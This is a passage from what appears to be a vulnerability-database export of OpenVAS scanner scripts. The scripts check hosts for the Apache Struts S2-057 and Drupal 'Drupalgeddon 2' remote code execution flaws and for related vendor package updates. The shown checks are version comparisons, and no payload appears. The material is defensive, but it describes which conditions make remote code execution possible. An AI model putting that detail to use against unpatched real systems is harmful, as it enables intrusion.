holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108792\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-11776\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace.\");\n\n script_tag(name:\"insight\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set 
for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace. (Vulnerability ID: HWPSIRT-2018-08200)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-11776.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this vulnerability to perform a remote code execution attack\");\n\n script_tag(name:\"affected\", value:\"Seco VSM versions V200R002C00\n\neLog versions V200R005C00 V200R006C10 V200R007C00SPC100\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181121-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:27", "description": "This host is running Apache Struts and is\n prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813786", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813786", "sourceData": "###############################################################################\n# 
OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813786\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-23 12:45:43 +0530 (Thu, 23 Aug 2018)\");\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057)\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", 
value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions\n when namespace value isn't set for a result defined in underlying configurations\n and in same time, its upper action(s) configurations have no or wildcard\n namespace. Same possibility when using url tag which doesn't have value and\n action set and in same time, its upper action(s) configurations have no or\n wildcard namespace.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attacker to possibly conduct remote code on the affected application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34,\n and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or\n 2.5.17 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:appPort, exit_no_version:TRUE)) exit(0);\nappVer = infos['version'];\npath = infos['location'];\n\nif(version_in_range(version:appVer, test_version:\"2.3\", test_version2:\"2.3.34\")){\n fix = \"2.3.35\";\n}\nelse if(version_in_range(version:appVer, test_version:\"2.5\", test_version2:\"2.5.16\")){\n fix = \"2.5.17\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:appPort);\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:34", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-22T00:00:00", "id": "OPENVAS:1361412562310812584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812584", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_drupal_core_rce_vuln_SA-CORE-2018-002_lin.nasl 12012 2018-10-22 09:20:29Z asteins $\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it 
and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:drupal:drupal';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812584\");\n script_version(\"$Revision: 12012 $\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-22 11:20:29 +0200 (Mon, 22 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 10:53:12 +0530 (Thu, 29 Mar 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Linux, Version Check)\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to critical remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists within multiple subsystems\n of Drupal. 
This potentially allows attackers to exploit multiple attack\n vectors on a Drupal site, which could result in the site being completely\n compromised.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code and completely compromise the site.\");\n\n script_tag(name:\"affected\", value:\"Drupal core versions 6.x and earlier,\n\n Drupal core versions 8.2.x and earlier,\n\n Drupal core versions 8.3.x to before 8.3.9,\n\n Drupal core versions 8.4.x to before 8.4.6,\n\n Drupal core versions 8.5.x to before 8.5.1 and\n\n Drupal core versions 7.x to before 7.58 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.3.9 or\n 8.4.6 or 8.5.1 or 7.58 or later. Please see the referenced links for available updates.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!drupalPort = get_app_port(cpe:CPE)) {\n exit(0);\n}\n\nif(!infos = 
get_app_version_and_location(cpe:CPE, port:drupalPort, version_regex:\"^([0-9.]+)\", exit_no_version:TRUE)) {\n exit(0);\n}\n\ndrupalVer = infos['version'];\npath = infos['location'];\n\nif(drupalVer =~ \"^(6\\.)\") {\n fix = \"Drupal 6 is End of Life.please contact a D6LTS vendor\";\n}\n\nif(drupalVer =~ \"^(8\\.2)\" || drupalVer == \"8.5.0\") {\n fix = \"Upgrade to 8.5.1\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"8.3.0\", test_version2:\"8.3.8\")) {\n fix = \"Upgrade to 8.3.9\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"8.4.0\", test_version2:\"8.4.5\")) {\n fix = \"Upgrade to 8.4.6\";\n}\n\nif(version_in_range(version:drupalVer, test_version:\"7.0\", test_version2:\"7.57\")) {\n fix = \"Upgrade to 7.58\";\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:drupalVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:drupalPort);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:06:51", "description": "Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. 
This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.", "cvss3": {}, "published": "2018-03-29T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for drupal7 (DLA-1325-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891325", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891325", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891325\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-7600\");\n script_name(\"Debian LTS: Security Advisory for drupal7 (DLA-1325-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-03-29 00:00:00 +0200 (Thu, 29 Mar 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/03/msg00028.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u18.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_tag(name:\"summary\", value:\"Jasper Mattsson found a remote code execution vulnerability in the\nDrupal content management system. 
This potentially allows attackers to\nexploit multiple attack vectors on a Drupal site, which could result in\nthe site being completely compromised.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u18\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-16T15:52:02", "description": "This host is running Drupal and is prone\n to critical remote code execution vulnerability.", "cvss3": {}, "published": "2018-04-14T00:00:00", "type": "openvas", "title": "Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2020-04-15T00:00:00", "id": "OPENVAS:1361412562310108438", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108438", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:drupal:drupal\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108438\");\n script_version(\"2020-04-15T09:02:26+0000\");\n script_cve_id(\"CVE-2018-7600\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-15 09:02:26 +0000 (Wed, 15 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-04-14 13:29:22 +0200 (Sat, 14 Apr 2018)\");\n script_name(\"Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check)\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\");\n script_mandatory_keys(\"drupal/installed\");\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://www.drupal.org/psa-2018-001\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-002\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/7.58\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.3.9\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.4.6\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/project/drupal/releases/8.5.1\");\n script_xref(name:\"URL\", value:\"https://research.checkpoint.com/uncovering-drupalgeddon-2/\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to critical remote code execution 
are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875500\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\",\n \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-03-08 04:12:02 +0100 (Fri, 08 Mar 2019)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2019-6a0717dc9a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-6a0717dc9a\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GLVLVCDPE4WHN5IUYGRFCMSNPXSJ56PU\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'drupal8' package(s) announced via the FEDORA-2019-6a0717dc9a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.6.10~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-05-12T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-2359c2ae0e", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6932", "CVE-2018-7602", "CVE-2017-6929", "CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874428", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874428", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_2359c2ae0e_drupal7_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\n#\n# Authors:\n# System Generated 
Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874428\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-05-12 06:06:46 +0200 (Sat, 12 May 2018)\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-7600\", \"CVE-2017-6927\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\", \"CVE-2017-6922\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-2359c2ae0e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n 
script_xref(name:\"FEDORA\", value:\"2018-2359c2ae0e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6MFVJWW3I4N6VEV7R3N23SPQMTUAXVS5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.59~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-7d748596e9", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600", "CVE-2017-6931", "CVE-2018-7602", "CVE-2017-6926", "CVE-2017-6930", "CVE-2018-9861", "CVE-2017-6927"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310814523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_7d748596e9_drupal8_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-7d748596e9\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text 
descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814523\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-7602\", \"CVE-2018-9861\", \"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\", \"CVE-2017-6931\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 08:19:36 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-7d748596e9\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7d748596e9\");\n script_xref(name:\"URL\", 
